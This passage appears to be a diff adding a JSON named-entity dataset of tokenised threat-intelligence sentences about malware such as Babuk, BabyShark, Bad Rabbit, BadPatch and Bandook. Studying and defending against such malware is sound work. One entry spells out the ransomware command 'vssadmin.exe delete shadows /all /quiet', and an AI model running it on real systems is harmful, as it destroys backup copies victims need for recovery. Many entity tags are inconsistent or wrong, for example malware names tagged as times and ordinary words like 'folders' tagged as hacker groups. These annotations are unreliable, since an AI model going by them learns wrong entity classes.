+ "agent", + "in", + "incoming", + "HTTP", + "requests." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BUSHWALK", + "is", + "a", + "web", + "shell", + "that", + "has", + "the", + "ability", + "to", + "execute", + "arbitrary", + "commands", + "or", + "write", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Babuk", + "can", + "use", + "ChaCha8", + "and", + "ECDH", + "to", + "encrypt", + "data." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Babuk", + "has", + "the", + "ability", + "to", + "unpack", + "itself", + "into", + "memory", + "using", + "XOR." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Babuk", + "can", + "stop", + "anti-virus", + "services", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Babuk", + "has", + "the", + "ability", + "to", + "enumerate", + "files", + "on", + "a", + "targeted", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Babuk", + "has", + "the", + "ability", + "to", + "delete", + "shadow", + "volumes", + "using", + "<code>vssadmin.exe", + "delete", + "shadows", + "/all", + "/quiet</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Babuk", + "can", + "use", + "multiple", + "Windows", + "API", + "calls", + "for", + "actions", + "on", + "compromised", + "hosts", + "including", + "discovery", + "and", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Babuk", + "has", + "the", + "ability", + "to", + "enumerate", + "network", + "shares." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Babuk", + "has", + "the", + "ability", + "to", + "check", + "running", + "processes", + "on", + "a", + "targeted", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Babuk", + "can", + "stop", + "specific", + "services", + "related", + "to", + "backups." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Versions", + "of", + "Babuk", + "have", + "been", + "packed." + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Babuk", + "can", + "enumerate", + "disk", + "volumes,", + "get", + "disk", + "information,", + "and", + "query", + "service", + "status." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "B-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Babuk", + "can", + "use", + "“WNetOpenEnumW”", + "and", + "“WNetEnumResourceW”", + "to", + "enumerate", + "files", + "in", + "network", + "resources", + "for", + "encryption." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Babuk", + "can", + "enumerate", + "all", + "services", + "running", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Babuk", + "has", + "the", + "ability", + "to", + "use", + "the", + "command", + "line", + "to", + "control", + "execution", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BabyShark", + "has", + "the", + "ability", + "to", + "decode", + "downloaded", + "files", + "prior", + "to", + "execution." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BabyShark", + "has", + "cleaned", + "up", + "all", + "files", + "associated", + "with", + "the", + "secondary", + "payload", + "execution." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BabyShark", + "has", + "used", + "<code>dir</code>", + "to", + "search", + "for", + "\"programfiles\"", + "and", + "\"appdata\"." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BabyShark", + "has", + "downloaded", + "additional", + "files", + "from", + "the", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BabyShark", + "has", + "a", + "PowerShell-based", + "remote", + "administration", + "ability", + "that", + "can", + "implement", + "a", + "PowerShell", + "or", + "C#", + "based", + "keylogger." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "BabyShark", + "has", + "used", + "mshta.exe", + "to", + "download", + "and", + "execute", + "applications", + "from", + "a", + "remote", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BabyShark", + "has", + "executed", + "the", + "<code>tasklist</code>", + "command." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BabyShark", + "has", + "executed", + "the", + "<code>reg", + "query</code>", + "command", + "for", + "<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal", + "Server", + "Client\\Default</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "BabyShark", + "has", + "added", + "a", + "Registry", + "key", + "to", + "ensure", + "all", + "future", + "macros", + "are", + "enabled", + "for", + "Microsoft", + "Word", + "and", + "Excel", + "as", + "well", + "as", + "for", + "additional", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-SamFile", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BabyShark", + "has", + "used", + "scheduled", + "tasks", + "to", + "maintain", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BabyShark", + "has", + "encoded", + "data", + "using", + "certutil", + "before", + "exfiltration." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BabyShark", + "has", + "executed", + "the", + "<code>ver</code>", + "command." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BabyShark", + "has", + "executed", + "the", + "<code>ipconfig", + "/all</code>", + "command." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BabyShark", + "has", + "executed", + "the", + "<code>whoami</code>", + "command." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BabyShark", + "has", + "used", + "cmd.exe", + "to", + "execute", + "commands." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BackConfig", + "has", + "been", + "signed", + "with", + "self", + "signed", + "digital", + "certificates", + "mimicking", + "a", + "legitimate", + "software", + "company." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Org" + ] + }, + { + "tokens": [ + "BackConfig", + "has", + "used", + "compressed", + "and", + "decimal", + "encoded", + "VBS", + "scripts." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "BackConfig", + "has", + "used", + "a", + "custom", + "routine", + "to", + "decrypt", + "strings." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BackConfig", + "has", + "the", + "ability", + "to", + "remove", + "files", + "and", + "folders", + "related", + "to", + "previous", + "infections." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BackConfig", + "has", + "the", + "ability", + "to", + "identify", + "folders", + "and", + "files", + "related", + "to", + "previous", + "infections." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BackConfig", + "has", + "the", + "ability", + "to", + "set", + "folders", + "or", + "files", + "to", + "be", + "hidden", + "from", + "the", + "Windows", + "Explorer", + "default", + "view." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BackConfig", + "can", + "download", + "and", + "execute", + "additional", + "payloads", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BackConfig", + "has", + "compromised", + "victims", + "via", + "links", + "to", + "URLs", + "hosting", + "malicious", + "content." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BackConfig", + "has", + "hidden", + "malicious", + "payloads", + "in", + "<code>%USERPROFILE%\\Adobe\\Driver\\dwg\\</code>", + "and", + "mimicked", + "the", + "legitimate", + "DHCP", + "service", + "binary." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BackConfig", + "can", + "leverage", + "API", + "functions", + "such", + "as", + "<code>ShellExecuteA</code>", + "and", + "<code>HttpOpenRequestA</code>", + "in", + "the", + "process", + "of", + "downloading", + "and", + "executing", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BackConfig", + "has", + "the", + "ability", + "to", + "use", + "hidden", + "columns", + "in", + "Excel", + "spreadsheets", + "to", + "store", + "executable", + "files", + "or", + "commands", + "for", + "VBA", + "macros." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Way", + "O", + "B-Way", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BackConfig", + "has", + "the", + "ability", + "to", + "use", + "scheduled", + "tasks", + "to", + "repeatedly", + "execute", + "malicious", + "payloads", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BackConfig", + "has", + "the", + "ability", + "to", + "gather", + "the", + "victim's", + "computer", + "name." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BackConfig", + "has", + "used", + "VBS", + "to", + "install", + "its", + "downloader", + "component", + "and", + "malicious", + "documents", + "with", + "VBA", + "macro", + "code." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BackConfig", + "has", + "the", + "ability", + "to", + "use", + "HTTPS", + "for", + "C2", + "communiations." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BackConfig", + "can", + "download", + "and", + "run", + "batch", + "files", + "to", + "execute", + "commands", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Backdoor.Oldrea", + "writes", + "collected", + "data", + "to", + "a", + "temporary", + "file", + "in", + "an", + "encrypted", + "form", + "before", + "exfiltration", + "to", + "a", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Some", + "Backdoor.Oldrea", + "samples", + "contain", + "a", + "publicly", + "available", + "Web", + "browser", + "password", + "recovery", + "tool." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Backdoor.Oldrea", + "collects", + "address", + "book", + "information", + "from", + "Outlook." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Backdoor.Oldrea", + "contains", + "a", + "cleanup", + "module", + "that", + "removes", + "traces", + "of", + "itself", + "from", + "the", + "victim." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Backdoor.Oldrea", + "collects", + "information", + "about", + "available", + "drives,", + "default", + "browser,", + "desktop", + "file", + "list,", + "My", + "Documents,", + "Internet", + "history,", + "program", + "files,", + "and", + "root", + "of", + "available", + "drives.", + "It", + "also", + "searches", + "for", + "ICS-related", + "software", + "files." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Way", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Backdoor.Oldrea", + "can", + "download", + "additional", + "modules", + "from", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Backdoor.Oldrea", + "can", + "use", + "a", + "network", + "scanning", + "module", + "to", + "identify", + "ICS-related", + "ports." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Backdoor.Oldrea", + "collects", + "information", + "about", + "running", + "processes." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Backdoor.Oldrea", + "injects", + "itself", + "into", + "explorer.exe." + ], + "ner_tags": [ + "B-Way", + "B-Way", + "I-Way", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Backdoor.Oldrea", + "adds", + "Registry", + "Run", + "keys", + "to", + "achieve", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Backdoor.Oldrea", + "can", + "enumerate", + "and", + "map", + "ICS-specific", + "systems", + "in", + "victim", + "environments." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Backdoor.Oldrea", + "can", + "use", + "rundll32", + "for", + "execution", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Some", + "Backdoor.Oldrea", + "samples", + "use", + "standard", + "Base64", + "+", + "bzip2,", + "and", + "some", + "use", + "standard", + "Base64", + "+", + "reverse", + "XOR", + "+", + "RSA-2048", + "to", + "decrypt", + "data", + "received", + "from", + "C2", + "servers." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Backdoor.Oldrea", + "collects", + "information", + "about", + "the", + "OS", + "and", + "computer", + "name." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Backdoor.Oldrea", + "collects", + "information", + "about", + "the", + "Internet", + "adapter", + "configuration." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Backdoor.Oldrea", + "collects", + "the", + "current", + "username", + "from", + "the", + "victim." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bad", + "Rabbit", + "has", + "attempted", + "to", + "bypass", + "UAC", + "and", + "gain", + "elevated", + "administrative", + "privileges." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Bad", + "Rabbit", + "has", + "encrypted", + "files", + "and", + "disks", + "using", + "AES-128-CBC", + "and", + "RSA-2048." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Bad", + "Rabbit", + "spread", + "through", + "watering", + "holes", + "on", + "popular", + "sites", + "by", + "injecting", + "JavaScript", + "into", + "the", + "HTML", + "body", + "or", + "a", + "<code>.js</code>", + "file." + ], + "ner_tags": [ + "B-Tool", + "B-HackOrg", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bad", + "Rabbit", + "used", + "the", + "EternalRomance", + "SMB", + "exploit", + "to", + "spread", + "through", + "victim", + "networks." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Features", + "B-Features", + "B-Exp", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bad", + "Rabbit", + "has", + "used", + "an", + "executable", + "that", + "installs", + "a", + "modified", + "bootloader", + "to", + "prevent", + "normal", + "boot-up." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bad", + "Rabbit", + "has", + "used", + "Mimikatz", + "to", + "harvest", + "credentials", + "from", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bad", + "Rabbit", + "has", + "been", + "executed", + "through", + "user", + "installation", + "of", + "an", + "executable", + "disguised", + "as", + "a", + "flash", + "installer." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bad", + "Rabbit", + "has", + "masqueraded", + "as", + "a", + "Flash", + "Player", + "installer", + "through", + "the", + "executable", + "file", + "<code>install_flash_player.exe</code>." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Bad", + "Rabbit", + "has", + "used", + "various", + "Windows", + "API", + "calls." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bad", + "Rabbit", + "enumerates", + "open", + "SMB", + "shares", + "on", + "internal", + "victim", + "networks." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bad", + "Rabbit’s", + "<code>infpub.dat</code>", + "file", + "uses", + "NTLM", + "login", + "credentials", + "to", + "brute", + "force", + "Windows", + "machines." + ], + "ner_tags": [ + "B-SamFile", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bad", + "Rabbit", + "can", + "enumerate", + "all", + "running", + "processes", + "to", + "compare", + "hashes." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bad", + "Rabbit", + "has", + "used", + "rundll32", + "to", + "launch", + "a", + "malicious", + "DLL", + "as", + "<code>C:Windowsinfpub.dat</code>." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Bad", + "Rabbit’s", + "<code>infpub.dat</code>", + "file", + "creates", + "a", + "scheduled", + "task", + "to", + "launch", + "a", + "malicious", + "executable." + ], + "ner_tags": [ + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bad", + "Rabbit", + "drops", + "a", + "file", + "named", + "<code>infpub.dat</code>into", + "the", + "Windows", + "directory", + "and", + "is", + "executed", + "through", + "SCManager", + "and", + "<code>rundll.exe</code>." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "BadPatch", + "collects", + "files", + "from", + "the", + "local", + "system", + "that", + "have", + "the", + "following", + "extensions,", + "then", + "prepares", + "them", + "for", + "exfiltration:", + ".xls,", + ".xlsx,", + ".pdf,", + ".mdb,", + ".rar,", + ".zip,", + ".doc,", + ".docx." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "BadPatch", + "searches", + "for", + "files", + "with", + "specific", + "file", + "extensions." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BadPatch", + "can", + "download", + "and", + "execute", + "or", + "update", + "malware." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-Features", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "BadPatch", + "has", + "a", + "keylogging", + "capability." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BadPatch", + "stores", + "collected", + "data", + "in", + "log", + "files", + "before", + "exfiltration." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BadPatch", + "uses", + "SMTP", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "BadPatch", + "establishes", + "a", + "foothold", + "by", + "adding", + "a", + "link", + "to", + "the", + "malware", + "executable", + "in", + "the", + "startup", + "folder." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BadPatch", + "captures", + "screenshots", + "in", + ".jpg", + "format", + "and", + "then", + "exfiltrates", + "them." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "B-HackOrg", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BadPatch", + "uses", + "WMI", + "to", + "enumerate", + "installed", + "security", + "products", + "in", + "the", + "victim’s", + "environment." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BadPatch", + "attempts", + "to", + "detect", + "if", + "it", + "is", + "being", + "run", + "in", + "a", + "Virtual", + "Machine", + "(VM)", + "using", + "a", + "WMI", + "query", + "for", + "disk", + "drive", + "name,", + "BIOS,", + "and", + "motherboard", + "information." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BadPatch", + "collects", + "the", + "OS", + "system,", + "OS", + "version,", + "MAC", + "address,", + "and", + "the", + "computer", + "name", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BadPatch", + "uses", + "HTTP", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Bandook", + "has", + "modules", + "that", + "are", + "capable", + "of", + "capturing", + "audio." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Bandook", + "was", + "signed", + "with", + "valid", + "Certum", + "certificates." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bandook", + "can", + "support", + "commands", + "to", + "execute", + "Java-based", + "payloads." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bandook", + "can", + "collect", + "local", + "files", + "from", + "the", + "system", + "." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bandook", + "has", + "decoded", + "its", + "PowerShell", + "script." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Bandook", + "can", + "upload", + "files", + "from", + "a", + "victim's", + "machine", + "over", + "the", + "C2", + "channel." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bandook", + "has", + "a", + "command", + "to", + "delete", + "a", + "file." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bandook", + "has", + "a", + "command", + "to", + "list", + "files", + "on", + "a", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bandook", + "can", + "download", + "files", + "to", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bandook", + "contains", + "keylogging", + "capabilities." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bandook", + "has", + "used", + "lure", + "documents", + "to", + "convince", + "the", + "user", + "to", + "enable", + "macros." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", 